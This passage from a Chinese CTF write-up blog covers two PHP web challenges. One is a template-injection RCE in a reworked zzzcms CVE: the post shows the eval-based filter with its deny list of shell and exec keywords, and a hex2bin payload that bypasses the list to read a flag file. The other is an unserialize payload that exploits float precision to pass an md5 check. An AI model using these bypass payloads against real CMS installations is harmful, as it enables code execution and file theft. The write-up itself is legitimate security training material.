class="string">'base_convert'</span>);</span><br><span class="line">    $s = str_ireplace($key,<span class="string">"*"</span>,$s); </span><br><span class="line">    $danger=<span class="keyword">array</span>(<span class="string">'php'</span>,<span class="string">'preg'</span>,<span class="string">'server'</span>,<span class="string">'chr'</span>,<span class="string">'decode'</span>,<span class="string">'html'</span>,<span class="string">'md5'</span>,<span class="string">'post'</span>,<span class="string">'get'</span>,<span class="string">'request'</span>,<span class="string">'file'</span>,<span class="string">'cookie'</span>,<span class="string">'session'</span>,<span class="string">'sql'</span>,<span class="string">'mkdir'</span>,<span class="string">'copy'</span>,<span class="string">'fwrite'</span>,<span class="string">'del'</span>,<span class="string">'encrypt'</span>,<span class="string">'$'</span>,<span class="string">'system'</span>,<span class="string">'exec'</span>,<span class="string">'shell'</span>,<span class="string">'open'</span>,<span class="string">'ini_'</span>,<span class="string">'chroot'</span>,<span class="string">'eval'</span>,<span class="string">'passthru'</span>,<span class="string">'include'</span>,<span class="string">'require'</span>,<span class="string">'assert'</span>,<span class="string">'union'</span>,<span class="string">'create'</span>,<span class="string">'func'</span>,<span class="string">'symlink'</span>,<span class="string">'sleep'</span>,<span class="string">'ord'</span>,<span class="string">'str'</span>,<span class="string">'source'</span>,<span class="string">'rev'</span>,<span class="string">'base_convert'</span>);</span><br><span class="line">    <span class="keyword">foreach</span> ($danger <span class="keyword">as</span> $val)&#123; </span><br><span class="line">        <span class="keyword">if</span>(strpos($s,$val) !==<span class="keyword">false</span>)&#123; </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">'很抱歉，执行出错，发现危险字符【'</span>.$val.<span class="string">'】'</span>); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/^[a-z]$/i"</span>))&#123; </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'很抱歉，执行出错，发现危险字符'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">return</span> $s; </span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parserIfLabel</span><span class="params">( $content )</span> </span>&#123; </span><br><span class="line">    $pattern = <span class="string">'/\&#123;if:([\s\S]+?)&#125;([\s\S]*?)&#123;end\s+if&#125;/'</span>; </span><br><span class="line">    <span class="keyword">if</span> ( preg_match_all( $pattern, $content, $matches ) ) &#123; </span><br><span class="line">        $count = count( $matches[ <span class="number">0</span> ] ); </span><br><span class="line">        <span class="keyword">for</span> ( $i = <span class="number">0</span>; $i &lt; $count; $i++ ) &#123; </span><br><span class="line">            $flag = <span class="string">''</span>; </span><br><span class="line">            $out_html = <span class="string">''</span>; </span><br><span class="line">            $ifstr = $matches[ <span class="number">1</span> ][ $i ]; </span><br><span class="line">            $ifstr=danger_key($ifstr,<span class="number">1</span>); </span><br><span class="line">            <span class="keyword">if</span>(strpos($ifstr,<span class="string">'='</span>) !== <span class="keyword">false</span>)&#123; </span><br><span class="line">                $arr= splits($ifstr,<span class="string">'='</span>); </span><br><span class="line">                <span class="keyword">if</span>($arr[<span class="number">0</span>]==<span class="string">''</span> || $arr[<span class="number">1</span>]==<span class="string">''</span>)&#123; </span><br><span class="line">                    <span class="keyword">die</span>(<span class="string">'很抱歉，模板中有错误的判断,请修正【'</span>.$ifstr.<span class="string">'】'</span>); </span><br><span class="line">                &#125; </span><br><span class="line">                $ifstr = str_replace( <span class="string">'='</span>, <span class="string">'=='</span>, $ifstr ); </span><br><span class="line">            &#125; </span><br><span class="line">            $ifstr = str_replace( <span class="string">'&lt;&gt;'</span>, <span class="string">'!='</span>, $ifstr ); </span><br><span class="line">            $ifstr = str_replace( <span class="string">'or'</span>, <span class="string">'||'</span>, $ifstr ); </span><br><span class="line">            $ifstr = str_replace( <span class="string">'and'</span>, <span class="string">'&amp;&amp;'</span>, $ifstr ); </span><br><span class="line">            $ifstr = str_replace( <span class="string">'mod'</span>, <span class="string">'%'</span>, $ifstr ); </span><br><span class="line">            $ifstr = str_replace( <span class="string">'not'</span>, <span class="string">'!'</span>, $ifstr ); </span><br><span class="line">            <span class="keyword">if</span> ( preg_match( <span class="string">'/\&#123;|&#125;/'</span>, $ifstr)) &#123; </span><br><span class="line">                <span class="keyword">die</span>(<span class="string">'很抱歉，模板中有错误的判断,请修正'</span>.$ifstr); </span><br><span class="line">            &#125;<span class="keyword">else</span>&#123; </span><br><span class="line">                @<span class="keyword">eval</span>( <span class="string">'if('</span> . $ifstr . <span class="string">')&#123;$flag="if";&#125;else&#123;$flag="else";&#125;'</span> ); </span><br><span class="line">            &#125; </span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> ( preg_match( <span class="string">'/([\s\S]*)?\&#123;else\&#125;([\s\S]*)?/'</span>, $matches[ <span class="number">2</span> ][ $i ], $matches2 ) ) &#123; </span><br><span class="line">                <span class="keyword">switch</span> ( $flag ) &#123; </span><br><span class="line">                    <span class="keyword">case</span> <span class="string">'if'</span>: </span><br><span class="line">                        <span class="keyword">if</span> ( <span class="keyword">isset</span>( $matches2[ <span class="number">1</span> ] ) ) &#123; </span><br><span class="line">                            $out_html .= $matches2[ <span class="number">1</span> ]; </span><br><span class="line">                        &#125; </span><br><span class="line">                        <span class="keyword">break</span>; </span><br><span class="line">                    <span class="keyword">case</span> <span class="string">'else'</span>: </span><br><span class="line">                        <span class="keyword">if</span> ( <span class="keyword">isset</span>( $matches2[ <span class="number">2</span> ] ) ) &#123; </span><br><span class="line">                            $out_html .= $matches2[ <span class="number">2</span> ]; </span><br><span class="line">                        &#125; </span><br><span class="line">                        <span class="keyword">break</span>; </span><br><span class="line">                &#125; </span><br><span class="line">            &#125; <span class="keyword">elseif</span> ( $flag == <span class="string">'if'</span> ) &#123; </span><br><span class="line">                $out_html .= $matches[ <span class="number">2</span> ][ $i ]; </span><br><span class="line">            &#125; </span><br><span class="line">            $pattern2 = <span class="string">'/\&#123;if([0-9]):/'</span>; </span><br><span class="line">            <span class="keyword">if</span> ( preg_match( $pattern2, $out_html, $matches3 ) ) &#123; </span><br><span class="line">                $out_html = str_replace( <span class="string">'&#123;if'</span> . $matches3[ <span class="number">1</span> ], <span class="string">'&#123;if'</span>, $out_html ); </span><br><span class="line">                $out_html = str_replace( <span class="string">'&#123;else'</span> . $matches3[ <span class="number">1</span> ] . <span class="string">'&#125;'</span>, <span class="string">'&#123;else&#125;'</span>, $out_html ); </span><br><span class="line">                $out_html = str_replace( <span class="string">'&#123;end if'</span> . $matches3[ <span class="number">1</span> ] . <span class="string">'&#125;'</span>, <span class="string">'&#123;end if&#125;'</span>, $out_html ); </span><br><span class="line">                $out_html = <span class="keyword">$this</span>-&gt;parserIfLabel( $out_html ); </span><br><span class="line">            &#125; </span><br><span class="line">            $content = str_replace( $matches[ <span class="number">0</span> ][ $i ], $out_html, $content ); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">return</span> $content; </span><br><span class="line">&#125; </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">splits</span><span class="params">( $s, $str=<span class="string">','</span> )</span> </span>&#123; </span><br><span class="line">    <span class="keyword">if</span> ( <span class="keyword">empty</span>( $s ) ) <span class="keyword">return</span> <span class="keyword">array</span>( <span class="string">''</span> ); </span><br><span class="line">    <span class="keyword">if</span> ( strpos( $s, $str ) !== <span class="keyword">false</span> ) &#123; </span><br><span class="line">        <span class="keyword">return</span> explode( $str, $s ); </span><br><span class="line">    &#125; <span class="keyword">else</span> &#123; </span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">array</span>( $s ); </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    这题目其实难度不低的，不知道为什么那么多的解。首先这是个<code>zzzcms</code>的一个<code>CVE</code>的二次加工。本来我们可以使用<code>{if:var_dump(((strrev(stnetnoc_teg_elif)))((strrev(edoced_46esab))(Li8uLi8uLi8uLi8uLi8uLi8uLi9mbGFn)))}</code>。</p>
<p>PS: 为什么可以这么写，可以查看 <a href="http://help.zzzcms.com/259324" target="_blank" rel="noopener"><code>zzzcms</code>的官方文档</a>。</p>
<p>​    但是我们这里的<code>str</code>被过滤了。那么我们就尝试一下别的编码呗。。发现<code>hex2bin</code>没有被过滤。测了一下，打穿了。。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?a&#x3D;&#123;if:var_dump(((hex2bin(%2766696C655F6765745F636F6E74656E7473%27)))(%27..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag%27))&#125;&#123;end%20if&#125;</span><br></pre></td></tr></table></figure>

<p><img src="C:%5CUsers%5CAcer%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20200821152824215.png" alt="image-20200821152824215"></p>
<h3 id="0x05-web5-easytrick"><a href="#0x05-web5-easytrick" class="headerlink" title="0x05 web5-easytrick"></a><code>0x05</code> <code>web5-easytrick</code></h3><p>​    这题被队友打穿了。队友太强了。。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">trick</span></span>&#123; </span><br><span class="line">    <span class="keyword">public</span> $trick1; </span><br><span class="line">    <span class="keyword">public</span> $trick2; </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123; </span><br><span class="line">        <span class="keyword">$this</span>-&gt;trick1 = (string)<span class="keyword">$this</span>-&gt;trick1; </span><br><span class="line">        <span class="keyword">if</span>(strlen(<span class="keyword">$this</span>-&gt;trick1) &gt; <span class="number">5</span> || strlen(<span class="keyword">$this</span>-&gt;trick2) &gt; <span class="number">5</span>)&#123; </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"你太长了"</span>); </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;trick1 !== <span class="keyword">$this</span>-&gt;trick2 &amp;&amp; md5(<span class="keyword">$this</span>-&gt;trick1) === md5(<span class="keyword">$this</span>-&gt;trick2) &amp;&amp; <span class="keyword">$this</span>-&gt;trick1 != <span class="keyword">$this</span>-&gt;trick2)&#123; </span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="string">"/flag"</span>); </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line">unserialize($_GET[<span class="string">'trick'</span>]);</span><br></pre></td></tr></table></figure>

<p>​    要求不说了。。其实就是一个<code>php</code>的精度问题。我们可以使用的解有:</p>
<p><code>解法一</code>:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">trick</span></span>&#123; </span><br><span class="line">    <span class="keyword">public</span> $trick1 = <span class="number">0.01</span>; </span><br><span class="line">    <span class="keyword">public</span> $trick2 = <span class="number">0.1</span>*<span class="number">0.1</span>;</span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line">$a = <span class="keyword">new</span> trick();</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//O:5:"trick":2:&#123;s:6:"trick1";d:0.01;s:6:"trick2";d:0.010000000000000002;&#125;</span></span><br></pre></td></tr></table></figure>

<p><code>解法二</code>:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">trick</span></span>&#123; </span><br><span class="line">    <span class="keyword">public</span> $trick1 = <span class="number">1</span>; </span><br><span class="line">    <span class="keyword">public</span> $trick2 = <span class="number">0.9999999999999999</span>;  <span class="comment">//这里的 9 的个数是固定的</span></span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line">$a = <span class="keyword">new</span> trick();</span><br><span class="line"><span class="keyword">echo</span> serialize($a);</span><br><span class="line"></span><br><span class="line"><span class="comment">//O:5:"trick":2:&#123;s:6:"trick1";i:1;s:6:"trick2";d:0.99999999999999989;&#125;</span></span><br></pre></td></tr></table></figure>

<h3 id="0x06-Conclusion"><a href="#0x06-Conclusion" class="headerlink" title="0x06 Conclusion"></a><code>0x06</code> Conclusion</h3><p>​    我是废物，队友乱C。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/10/%E4%BB%8E%E9%9B%B6%E5%BC%80%E5%A7%8B%E7%9A%84Oracle%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/" rel="prev" title="从零开始的Oracle注入学习">
      <i class="fa fa-chevron-left"></i> 从零开始的Oracle注入学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/08/26/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B/" rel="next" title="浅谈php反序列化的参数类型">
      浅谈php反序列化的参数类型 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-Perface"><span class="nav-number">1.</span> <span class="nav-text">0x00 Perface</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-web1-easyphp"><span class="nav-number">2.</span> <span class="nav-text">0x01 web1-easyphp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-web2-babyunserialize"><span class="nav-number">3.</span> <span class="nav-text">0x02 web2-babyunserialize</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-web3-littlegame"><span class="nav-number">4.</span> <span class="nav-text">0x03 web3-littlegame</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-web4-rceme"><span class="nav-number">5.</span> <span class="nav-text">0x04 web4-rceme</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-web5-easytrick"><span class="nav-number">6.</span> <span class="nav-text">0x05 web5-easytrick</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06-Conclusion"><span class="nav-number">7.</span> <span class="nav-text">0x06 Conclusion</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Cxlover"
      src="https://i.loli.net/2020/10/30/Ots32uQAImSbJC8.png">
  <p class="site-author-name" itemprop="name">Cxlover</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://xzlang.github.io/" title="https:&#x2F;&#x2F;xzlang.github.io&#x2F;" rel="noopener" target="_blank">Xzlang's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://0xdktb.top/" title="http:&#x2F;&#x2F;0xdktb.top&#x2F;" rel="noopener" target="_blank">0xDktb's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.d3vil.top/" title="http:&#x2F;&#x2F;www.d3vil.top&#x2F;" rel="noopener" target="_blank">d3vil's  Blog</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cxlover</span>
</div>
<!--  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div>
  -->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  
    <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":true,"debug":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":250,"height":500},"mobile":{"show":false},"log":false});</script>
</body>
</html>
